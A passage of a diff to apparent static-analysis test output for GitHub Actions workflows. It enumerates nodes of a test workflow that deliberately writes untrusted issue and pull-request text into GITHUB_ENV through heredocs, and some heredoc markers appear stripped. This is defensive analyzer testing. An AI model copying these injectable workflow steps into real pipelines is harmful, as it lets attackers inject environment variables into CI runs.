"$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| 
.github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:34:6 | Run Step | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << 
EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | 
.github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| 
.github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| 
.github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:1:1:89:29 | 
on: | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | 
@@ -292,11 +402,11 @@ cfgNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:1:1:33:14 | enter on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:1:1:89:29 | enter on: | +| .github/workflows/multiline.yml:1:1:89:29 | exit on: | +| .github/workflows/multiline.yml:1:1:89:29 | exit on: (normal) | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | 
@@ -305,9 +415,29 @@ cfgNodes | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -354,7 +484,7 @@ dfNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | 
@@ -363,9 +493,29 @@ dfNodes | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | 
@@ -413,7 +563,7 @@ nodeLocations | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | .github/workflows/multiline.yml:9:5:89:29 | .github/workflows/multiline.yml@9:5:89:29 | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | 
@@ -422,9 +572,29 @@ nodeLocations | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:9:34:6 | .github/workflows/multiline.yml@30:9:34:6 | | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:9:40:6 | .github/workflows/multiline.yml@34:9:40:6 | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:35:14:39:14 | .github/workflows/multiline.yml@35:14:39:14 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:9:46:6 | .github/workflows/multiline.yml@40:9:46:6 | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:41:14:45:14 | .github/workflows/multiline.yml@41:14:45:14 | +| .github/workflows/multiline.yml:46:9:52:6 
| Run Step | .github/workflows/multiline.yml:46:9:52:6 | .github/workflows/multiline.yml@46:9:52:6 | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:47:14:51:14 | .github/workflows/multiline.yml@47:14:51:14 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:9:58:6 | .github/workflows/multiline.yml@52:9:58:6 | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:53:14:57:14 | .github/workflows/multiline.yml@53:14:57:14 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:9:63:6 | .github/workflows/multiline.yml@58:9:63:6 | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:59:14:62:14 | .github/workflows/multiline.yml@59:14:62:14 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:9:66:6 | .github/workflows/multiline.yml@63:9:66:6 | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:64:14:65:136 | .github/workflows/multiline.yml@64:14:65:136 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:9:71:6 | .github/workflows/multiline.yml@66:9:71:6 | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:67:14:70:36 | .github/workflows/multiline.yml@67:14:70:36 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:9:78:6 | .github/workflows/multiline.yml@71:9:78:6 | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> 
"$GITHUB_ENV"\n | .github/workflows/multiline.yml:72:14:77:29 | .github/workflows/multiline.yml@72:14:77:29 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:9:85:6 | .github/workflows/multiline.yml@78:9:85:6 | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -444,7 +614,7 @@ nodeLocations | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | 
@@ -575,20 +745,59 @@ testNormalizeExpr | github.event.pull_request.user["login"] | github.event.pull_request.user.login | | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv1 +| JSON_RESPONSE<> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}) | PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV})\nEOF | +| VAR0 | $TITLE | VAR0<> $GITHUB_ENV) | VAR3<> $GITHUB_ENV)\nEOF | +| VAR4 | ${ISSUE_BODY1} | VAR4=${ISSUE_BODY1} | +| VAR5 | Hello\nWorld | VAR5<> $GITHUB_ENV", - "echo 'sha2=$(> $GITHUB_ENV", - "echo sha3=$(> $GITHUB_ENV", + "FOO\n{\n echo 'JSON_RESPONSE<> \"$GITHUB_ENV\"\nBAR" + //"FOO\n{\n echo 'JSON_RESPONSE<> \"$GITHUB_ENV\"\nBAR", + //"FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", ] and - extractLineAssignment(t, "ENV", key, value) + //linesFileWrite(t, _, 